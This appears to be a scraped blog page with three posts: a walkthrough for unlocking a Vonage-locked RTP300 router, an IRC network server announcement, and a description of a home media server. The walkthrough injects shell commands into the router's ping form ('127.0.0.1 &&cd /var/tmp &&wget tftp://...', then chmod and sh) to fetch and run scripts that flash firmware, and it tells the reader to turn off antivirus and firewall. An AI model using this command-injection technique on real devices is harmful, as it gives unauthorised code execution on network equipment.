Hello Guys Here’s how to hack your Jailed RTP300

Step 1. Files you will need
  1. tFTP -> http://tftpd32.jounin.net/download/Tftpd32-3.35-setup.exe
  2. The Zip -> Hack RTP300.zip
  3. Firefox -> www.mozilla.com/en-US/firefox/ With -> https://addons.mozilla.org/en-US/firefox/addon/60
  4. A beer

Keep this page aways up so you have something to look at case you forget something

Step 2: Configure TFTP32

  1. Run TFTP32. Click settings, and then setup the base directory. Use the directory you installed the program (ex. C:\Program Files\TFTP32) and make sure the extracted files from the ZIP are in this directory. Change security to none, and set the timeout and max retransmit to 10 and then hit OK.

Step 3: Unlock the Console using Ping Hack

  1. Make sure you have downloaded everything from step 1 and ensure the getready file from the ZIP is in the TFTP32 folder. Now disconnect from the internet and connect directly to the RTP300 making sure the device is also not connected to the internet (ie. pull the Ethernet cord out of the WAN port). Also make sure to disable any Anti-Virus and firewall programs that may be running.
  2. Use a paperclip and hard reset the RTP300 (hold reset for 10-15 seconds). Go to »192.168.15.1 with the username/pass of admin/admin. Once the router restarts go to Administration >> Ping. Also make sure TFTP32 is running.
  3. On the Ping popup, right click >> Web Developer >> Forms >> Remove Maximum Lengths.

Enter the following and click Ping.

  1. 127.0.0.1 &&cd /var/tmp &&wget tftp://192.168.15.100/getready

Right Click >> Web Developer >> Forms >> Remove Maximum Lengths. Enter the following and click Ping.

  1. 127.0.0.1 &&cd /var/tmp &&chmod 755 getready

Right Click >> Web Developer >> Forms >> Remove Maximum Lengths. Enter the following and click Ping.

  1. 127.0.0.1 &&sh /var/tmp/getready

After a few seconds you should see some information in the output box. Scroll down to the last line and look for CONSOLE_STATE unlocked. If you see this you are good to go. Now Restart the RTP300

Step 5. The Hack

  1. Log back into the router and go to Administration >> Ping. Also make sure TFTP32 is running.
  2. On the Ping popup, right click >> Web Developer >> Forms >> Remove Maximum Lengths.

Enter the following and click Ping.

  1. 127.0.0.1 &&cd /var/tmp &&wget tftp://192.168.15.100/install

Right Click >> Web Developer >> Forms >> Remove Maximum Lengths. Enter the following and click Ping.

  1. 127.0.0.1 &&cd /var/tmp &&chmod 755 install

Right Click >> Web Developer >> Forms >> Remove Maximum Lengths. Enter the following and click Ping.

  1. 127.0.0.1 &&sh /var/tmp/install

You should now see a file transfer in progress under TFTP32. After the firmware has been transferred the power light on the RTP300 will start to blink if everything is successful. DO NOT INTERRUPT THIS PROCESS. IT MAY TAKE UP TO 2-4 MINUTES TO COMPLETE. WAIT FOR THE POWER LIGHT TO RETURN SOLID AND FOR AN ETHERNET LINK TO BE ESTABLISHED.

Boom Son you got non vonage RTP300!!!

We got a new server “Lithium” witch is in the UK this will provide UK people a faster connections. Take a look at the speed update.

User 1 UK:   User to RedFire(US): 270 ms, User to Lithium UK: 32 ms.

User 2 UK:   User to RedFire(US): 589 ms, User to Lithium UK: 106 ms.

Now if you add Lithium to Hub its +89.1 ms.

This is a big update for TechToKnow, and to keep you connected to the fastest IRC Server you will be tested before you connect each server will ping you for the fastest server and load you to it. So You will know your chatters will always have the fastest server and if the ping fails we will load a default one.

Also like to take a Look at your ping to it? take a Look at the Servers page of TechToKnow IRC we added it so you can look at your ping, Its not Open for Public use yet but will be up ASAP.

Have Fun and happy chatting!

My Small HomeServer

I have made a Computer with Windows XP Pro on it… that I use for a Small media/Server, Now I have a SonicWall Hardware Firewall Hooked up to it so it cant be hacked/gotten into…

The Server on the firewall can only output on HTTP only Min 50 kbs – 350 kps this is to keep bandwith low and my rest of the home network fast.

I’m on a Comcast home internet Service and that firewall gets hit 250 times a day with port scans, ICMP/SYNC flooding so that firewall works very good.

So back to my home server its a CPU: 933 MHZ  P3, RAM:  368 MB SD, HDD: 10 GB Seagate something, Connected to a SonicWall Hardware firewall(Sonicwall TZ 180) on Port E1, at 100 MB.

What do I run on this? Well Right now…

1 IRC Bot(MIRC).

1 VLC pumping a shoutcast stream to a Ventrilo I have running to Our Ventrilo server.

1 Ventrilo(Said Why above).

1 XAMPLite(with PHP and MySQL) used for Webserver.

1 Weather Bug(Used for a PHP Script I made).

1 Bittorrnt So if I need to torrent anything.

1 VNC  So I can easily remote into it to fix somthing.

1 hMail Server I can can send email locally with firewall and antivirus.

Thats it!

To Keep this Always on I have it up to a UPS and… I have a Generator if need to be…

The Screenshot(Taken with VNC),

homeserver(Real Size of Screen)

I will Take More Pictures  of it soon :D
